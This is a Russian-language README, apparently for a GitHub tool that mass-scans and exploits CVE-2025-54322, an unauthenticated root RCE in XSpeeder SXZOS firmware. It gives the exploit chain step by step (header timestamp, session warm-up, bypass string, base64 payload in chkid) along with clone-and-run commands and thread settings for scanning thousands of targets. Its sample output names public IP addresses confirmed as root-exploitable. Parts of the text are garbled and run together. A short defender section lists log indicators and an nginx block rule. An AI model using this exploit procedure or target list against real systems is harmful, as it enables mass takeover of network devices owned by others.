
CVE-2025-54322 - XSpeeder SXZOS: быстрый поиск Pre-Auth RCE 0day
Многопоточный сканер уязвимости CVE-2025-54322, неаутентифицированной уязвимости удаленного выполнения кода в прошивке XSpeeder SXZOS, затрагивающей ~70 000+ хостов по всему миру.
CVE-2025-54322 – это критическая уязвимость удаленного выполнения кода без аутентификации, обнаруженная в прошивке XSpeeder SXZOS, которая используется в SD-WAN-устройствах, маршрутизаторах и пограничном сетевом оборудовании.
Уязвимость существует в веб-интерфейсе на основе Django прошивки SXZOS:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() для декодированных из base64 пользовательских данных1. Вычислить временную метку для заголовка X-SXZ-R
2. Прогреть сессию через конечную точку /webInfos/
3. Создать вредоносную нагрузку со строкой обхода (#sUserCodexsPwd)
4. Закодировать нагрузку в Base64
5. Отправить эксплойт с ровно 3 параметрами запроса
6. Сервер декодирует и выполняет нагрузку
7. Команды выполняются с правами root
Эксплойт обходит несколько уровней защиты:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt немедленно# Клонировать репозиторий
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Установить необходимые зависимости
pip install -r requirements.txt
Создайте файл requirements.txt:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Сканирование с пользовательским количеством потоков (по умолчанию: 10)
python3 scanner.py targets.txt 20
# Сканирование с максимальным количеством потоков для ускорения
python3 scanner.py targets.txt 50
# Сканирование с консервативным количеством потоков
python3 scanner.py targets.txt 5
Создайте файл targets.txt с одной целью на строку:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) Сканер RCE ║
║ Проверка уязвимости RCE с root-доступом без аутентификации║
║ Показаны: ТОЛЬКО УЯЗВИМЫЕ ХОСТЫ ║
╚═══════════════════════════════════════════════════════════════╝
[*] Загружено 2338 целей из targets.txt
[*] Используется 20 конкурентных потоков
[*] Уязвимые хосты будут сохранены в: vuln-confirm.txt
[*] Запуск сканирования...
======================================================================
[+] УЯЗВИМ: https://27.40.80.93:4433
[+] Статус: УЯЗВИМ - RCE подтверждено
[+] HTTP статус: 500
[+] Вывод: uid=0(root) gid=0(root)
======================================================================
[*] Прогресс: 50/2338 | Найдено: 12 уязвимых
[*] Прогресс: 100/2338 | Найдено: 24 уязвимых
======================================================================
[*] СКАНИРОВАНИЕ ЗАВЕРШЕНО
======================================================================
[*] Общее время: 890.45 сек
[*] Всего просканировано целей: 2338
[*] Уязвимых хостов найдено: 156
[*] Уровень успеха: 6.67%
======================================================================
Сканер отображает:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Уязвимые хосты
Сканирование начато: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Статус: УЯЗВИМ - RCE подтверждено
Вывод: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Статус: УЯЗВИМ - RCE подтверждено
Вывод: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Сканирование завершено: 2025-12-27 15:45:30
Всего просканировано: 2338
Уязвимых: 156
Затраченное время: 890.45 сек
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.
Если вы обнаружите уязвимые системы:
Если вы управляете устройствами XSpeeder SXZOS:
Ищите эти индикаторы в журналах:
/?title=*&oIp=*&chkid=* с нагрузками в base64SXZ/2.3X-SXZ-R#sUserCodexsPwd/webInfos/, за которыми следует корневой путь# Правило Nginx для блокировки попыток эксплуатации
location / {
if ($args ~* "chkid=") {
return 403;
}
}
Эта уязвимость была автономно обнаружена pwn.ai – платформой исследований безопасности на основе ИИ.
Важное примечание: Это первая публично задокументированная найденная агентом, удаленно эксплуатируемая zero-day RCE уязвимость.
Chirag Artani
Эта реализация сканера была создана для помощи специалистам по безопасности:
Этот проект лицензирован в соответствии с условиями MIT License – см. файл LICENSE.
Вклад приветствуется! Пожалуйста, не стесняйтесь отправлять Pull Request.
По вопросам, проблемам или предложениям:
Помните: С большой силой приходит большая ответственность. Используйте этот инструмент этично и законно.
Будьте в безопасности. Будьте этичны. Будьте законопослушны.
| Количество целей | Рекомендуемые потоки | Ожидаемое время |
|---|
| 1-10 | 5 потоков | ~1-2 мин |
| 10-50 | 10 потоков | ~3-5 мин |
| 50-100 | 20 потоков | ~5-10 мин |
| 100-500 | 30 потоков | ~10-20 мин |
| 500+ | 40-50 потоков | ~20+ мин |